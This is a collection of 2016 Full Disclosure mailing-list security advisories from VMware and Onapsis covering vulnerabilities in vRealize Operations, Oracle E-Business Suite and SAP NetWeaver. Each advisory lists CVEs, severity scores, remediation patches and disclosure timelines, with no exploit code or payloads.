[FD] NEW VMSA-2016-0016 - vRealize Operations (vROps) updates address privilege escalation vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- - --- VMware Security Advisory Advisory ID: VMSA-2016-0016 Severity:Critical Synopsis:vRealize Operations (vROps) updates address privilege escalation vulnerability Issue date: 2016-10-11 Updated on: 2016-10-11 (Initial Advisory) CVE number: CVE-2016-7457 1. Summary vRealize Operations (vROps) updates address privilege escalation vulnerability. 2. Relevant Products vRealize Operations (vROps) 3. Problem Description vROps privilege escalation issue vROps contains a privilege escalation vulnerability. Exploitation of this issue may allow a vROps user who has been assigned a low-privileged role to gain full access over the application. In addition it may be possible to stop and delete Virtual Machines managed by vCenter. VMware would like to thank Edgar Carvalho for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2016-7457 to this issue. Column 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMwareProductRunningReplace with/ Product Versionon Severity Apply Patch Workaround = === == vRealize 6.3.0 Any Critical patch pending KB2147215 Operations vRealize 6.2.1 Any Critical patch pending KB2147247 Operations vRealize 6.2.0a Any Critical patch pending KB2147246 Operations vRealize 6.1.0 Any Critical patch pending KB2147248 Operations vRealize 6.0.x Any N/A not affected N/A Operations vRealize 5.xAny N/A not affected N/A Operations 4. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. vRealize Operations Downloads and Documentation: https://my.vmware.com/en/web/vmware/info/slug/infrastructure_operations_man agement/vmware_vrealize_operations/6_3 5. References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7457 https://kb.vmware.com/kb/2147215 https://kb.vmware.com/kb/2147247 https://kb.vmware.com/kb/2147246 https://kb.vmware.com/kb/2147248 - 6. Change log 2016-10-11 VMSA-2016-0016 Initial security advisory in conjunction with the release of vROps patches on 2016-10-11. - 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: security-announce at lists.vmware.com bugtraq at securityfocus.com fulldisclosure at seclists.org E-mail: security at vmware.com PGP key at: https://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html Twitter https://twitter.com/VMwareSRC Copyright 2016 VMware Inc. All rights reserved. -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8 wj8DBQFX/S0YDEcm8Vbi9kMRAhh7AJ0ctS7c+oxpaQCNvEx+SpVM5fawZACfYvPA IhRXucua8IjVJBRr8/z45wg= =JUi8 -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Onapsis Security Advisory ONAPSIS-2016-057: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-057: Oracle E-Business Suite Cross Site Scripting (XSS) 1. Impact on Business = By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system. Risk Level: Medium 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-057 - Onapsis SVS ID: ONAPSIS-00260 - CVE: CVE-2016-0533 - Researcher: Matias Mevied - Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N) - Onapsis CVSS v3: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) 3. Vulnerability Information - Vendor: Oracle - Affected Components: Oracle E-Business Suite 12.2 - Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79) - Remotely Exploitable: Yes - Locally Exploitable: No - Authentication Required: No - Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vi-0 4. Affected Components Description == Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server. 5. Vulnerability Details A remote unauthenticated attacker could use a specific JSP file to execute arbitrary code. This file has a parameter which is not validated and neither encoded. 6. Solution === Implement Oracle Critical Patch Update released in July 2016. 7. Report Timeline == - 02/29/2016: Onapsis provides vulnerability information to Oracle. - 03/01/2016: Oracle confirms reception of vulnerability report. - 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability. - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on
[FD] Onapsis Security Advisory ONAPSIS-2016-056: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-056: Oracle E-Business Suite Cross Site Scripting (XSS) 1. Impact on Business = By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system. Risk Level: Medium 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-056 - Onapsis SVS ID: ONAPSIS-00269, ONAPSIS-00270, ONAPSIS-00271, ONAPSIS-00272, ONAPSIS-00273, ONAPSIS-00274 and ONAPSIS-00275 - CVE: CVE-2016-3532 - Researcher: Matias Mevied - Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N) - Onapsis CVSS v3: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) 3. Vulnerability Information - Vendor: Oracle - Affected Components: Oracle E-Business Suite 12.2 - Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79) - Remotely Exploitable: Yes - Locally Exploitable: No - Authentication Required: No - Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-v 4. Affected Components Description == Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server. 5. Vulnerability Details A remote unauthenticated attacker could use a specific JSP file to execute arbitrary code. This file has seven parameters which are not validated and neither encoded. 6. Solution === Implement Oracle Critical Patch Update released in July 2016. 7. Report Timeline == - 02/29/2016: Onapsis provides vulnerability information to Oracle. - 03/01/2016: Oracle confirms reception of vulnerability report. - 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability. - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended
[FD] Onapsis Security Advisory ONAPSIS-2016-055: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-055: Oracle E-Business Suite Cross Site Scripting (XSS) 1. Impact on Business = By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system. Risk Level: Medium 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-055 - Onapsis SVS ID: ONAPSIS-00277, ONAPSIS-00278 and ONAPSIS-00279 - CVE: CVE-2016-3533 - Researcher: Matias Mevied - Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N) - Onapsis CVSS v3: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) 3. Vulnerability Information - Vendor: Oracle - Affected Components: Oracle E-Business Suite 12.2 - Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79) - Remotely Exploitable: Yes - Locally Exploitable: No - Authentication Required: No - Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-iv 4. Affected Components Description == Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server. 5. Vulnerability Details A remote unauthenticated attacker could use a specific JSP file to execute arbitrary code. This file has three parameters which are not validated and neither encoded. 6. Solution === Implement Oracle Critical Patch Update released in July 2016. 7. Report Timeline == - 02/29/2016: Onapsis provides vulnerability information to Oracle. - 03/01/2016: Oracle confirms reception of vulnerability report. - 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability. - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying,
[FD] Onapsis Security Advisory ONAPSIS-2016-053: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-053: Oracle E-Business Suite Cross Site Scripting (XSS) 1. Impact on Business = By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system. Risk Level: Medium 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-53 - Onapsis SVS ID: ONAPSIS-00281 - CVE: CVE-2016-3535 - Researcher: Matias Mevied - Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N) - Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) 3. Vulnerability Information - Vendor: Oracle - Affected Components: Oracle E-Business Suite 12.2 - Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79) - Remotely Exploitable: Yes - Locally Exploitable: No - Authentication Required: No - Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vii 4. Affected Components Description == Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server. 5. Vulnerability Details A remote unauthenticated attacker could use a specific JSP file to execute arbitrary code. This file has a parameter which is not validated and neither encoded. 6. Solution === Implement Oracle Critical Patch Update released in July 2016. 7. Report Timeline == - 02/29/2016: Onapsis provides vulnerability information to Oracle. - 03/01/2016: Oracle confirms reception of vulnerability report. - 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability. - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in
[FD] Onapsis Security Advisory ONAPSIS-2016-052: Oracle E-Business Suite Cross Site Scripting (XSS)
Onapsis Security Advisory ONAPSIS-2016-052: Oracle E-Business Suite Cross Site Scripting (XSS) 1. Impact on Business = By exploiting this vulnerability, a remote attacker could steal sensitive business information by targeting other users connected to the system. Risk Level: Medium 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-052 - Onapsis SVS ID: ONAPSIS-00282 and ONAPSIS-00283 - CVE: CVE-2016-3536 - Researcher: Matias Mevied - Vendor Provided CVSS v3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N) - Onapsis CVSS v3: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) 3. Vulnerability Information - Vendor: Oracle - Affected Components: Oracle E-Business Suite 12.2 - Vulnerability Class: Improper Neutralization of Input During Web Page Generation (CWE-79) - Remotely Exploitable: Yes - Locally Exploitable: No - Authentication Required: No - Original Advisory: https://www.onapsis.com/research/security-advisories/oracle-e-business-suite-cross-site-scripting-xss-vi 4. Affected Components Description == Oracle E-Business Suite has more than 8000 JSP files which interact with the web listener and the data server. 5. Vulnerability Details A remote unauthenticated attacker could use a specific JSP file to execute arbitrary code. This file has two parameters which are not validated and neither encoded. 6. Solution === Implement Oracle Critical Patch Update released in July 2016. 7. Report Timeline == - 02/29/2016: Onapsis provides vulnerability information to Oracle. - 03/01/2016: Oracle confirms reception of vulnerability report. - 07/19/2016: Oracle releases the Critical Patch Update in July 2016 fixing the vulnerability. - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or
[FD] Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption
Onapsis Security Advisory ONAPSIS-2016-051: SAP Business Objects Memory Corruption 1. Impact on Business = By exploiting this vulnerability an attacker could hide audit information logged by the SAP system. Risk Level: Low 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-051 - Onapsis SVS ID: ONAPSIS-00247 - CVE: CVE-2016-7437 - Researcher: Emiliano J. Fausto - Vendor Provided CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N) - Onapsis CVSS v2: 1.7 (AV:L/AC:L/Au:S/C:N/I:P/A:N) 3. Vulnerability Information - Vendor: SAP AG - Affected Components: SAP NETWEAVER 7.40 - Vulnerability Class: Insufficient Logging (CWE-778) - Remotely Exploitable: No - Locally Exploitable: Yes - Authentication Required: Yes - Original Advisory: https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0 4. Affected Components Description == The SAP Security Audit Log is used to record security-related system information such as changes to user master records or unsuccessful logon attempts. This log is a tool designed for auditors who need to take a detailed look at what occurs in the SAP System. By activating the audit log, you keep a record of those activities that you specify for your audit. You can then access this information for evaluation in the form of an audit analysis report. 5. Vulnerability Details Even when configuring the parameter rfc/callback_security_method and the SAP Security Audit Log to consider RFC callbacks events (Accepted/Rejected), both events DUI/DUJ will be logged in the SAP Security Audit Log as Non-critical. As the information provided by the SAP Security Audit Log to the security expert is inaccurate, filtering out non-critical events will also filter rejected attempts to execute RFC function callbacks. 6. Solution === Implement SAP Security Note 2252312. 7. Report Timeline == - 11/24/2015: Onapsis provides vulnerability information to SAP AG. - 01/09/2016: SAP releases SAP Security Note 2252312 fixing the vulnerability. - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual
[FD] Onapsis Security Advisory ONAPSIS-2016-005: SAP SLDREG memory corruption
Onapsis Security Advisory ONAPSIS-2016-005: SAP SLDREG memory corruption 1. Impact on Business = By exploiting this vulnerability, an attacker could potentially abuse of technical functions to access and/or compromise the business information. Risk Level: Low 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-005 - Onapsis SVS ID: ONAPSIS-00161 - CVE: CVE-2016-3638 - Researcher: Nahuel D. Sanchez - Vendor Provided CVSS v2: 1.5 (AV:L/AC:M/Au:S/C:N/I:N/A:P) - Onapsis CVSS v2: 2.1 (AV:L/AC:L/Au:N/C:N/I:N/A:P) 3. Vulnerability Information - Vendor: SAP AG - Affected Components: SLD Registration Program - Vulnerability Class: Buffer errors (CWE-119) - Remotely Exploitable: No - Locally Exploitable: Yes - Authentication Required: No - Original Advisory: https://www.onapsis.com/research/security-advisories/sap-sldreg-memory-corruption 4. Affected Components Description == The SLDREG tool is used to register SAP Systems in the System Landscape Directory. The System Landscape Directory of SAP NetWeaver (SLD) serves as a central information repository for the system landscape. 5. Vulnerability Details The SLDREG binary is prone to a memory corruption vulnerability, when a specially crafted input is passed as HOST parameter. 6. Solution === Implement SAP Security Note 2125623. 7. Report Timeline == - 01/30/2015: Onapsis provides vulnerability information to SAP AG. - 02/02/2015: SAP AG confirms reception of vulnerability report. - 03/10/2015: SAP Reported that the vulnerability is not a security issue - 04/14/2015: SAP reported fix is In Process. - 05/12/2015: SAP reported fix is In Process. - 06/09/2015: SAP reported fix is In Process. - 07/14/2015: SAP reported fix is In Process. - 08/11/2015: SAP released SAP Security Note 2125623 fixing the vulnerability. - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis’ enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis’ solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E, KPMG and PwC. Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis’ context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this
[FD] Onapsis Security Advisory ONAPSIS-2016-050: SAP OS Command Injection in SCTC_REFRESH_CONFIG_CTC
Onapsis Security Advisory ONAPSIS-2016-050: SAP OS Command Injection in SCTC_REFRESH_CONFIG_CTC 1. Impact on Business = By exploiting this vulnerability an authenticated user will be able to take full control of the system. Risk Level: Critical 2. Advisory Information === - Public Release Date: 09/22/2016 - Last Revised: 09/22/2016 - Security Advisory ID: ONAPSIS-2016-050 - Onapsis SVS ID: ONAPSIS-00252 - CVE: CVE-2016-7435 - Researcher: Pablo Artuso - Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H) - Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) 3. Vulnerability Information - Vendor: SAP AG - Affected Components: SAP Netweaver 7.40 SP 12 - Vulnerability Class: Improper Neutralization of Special Elements used in an OS Command (CWE-78) - Remotely Exploitable: Yes - Locally Exploitable: No - Authentication Required: Yes - Original Advisory: https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshconfigctc 4. Affected Components Description == SAP NetWeaver is the SAP technological integration platform, on top of which, enterprise and business solutions are developed and run. In particular, SCTC is a subpackage of SAP_BASIS which holds technical configurations. 5. Vulnerability Details The SCTC_REFRESH_CONFIG_CTC function doesn't correctly sanitize variables used when executing CALL 'SYSTEM' statement, allowing an attacker, with particular privileges, to execute any arbitrary OS command. 6. Solution === Implement SAP Security Note 2260344. 7. Report Timeline == - 11/26/2015: Onapsis provides vulnerability information to SAP AG. - 11/27/2015: SAP AG confirms reception of vulnerability report. - 01/12/2016: SAP reports fix is In Process. - 03/08/2016: SAP releases SAP Security Note 2260344 fixing the vulnerability. - 09/22/2016: Onapsis Releases Security Advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. About Onapsis, Inc. === Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. 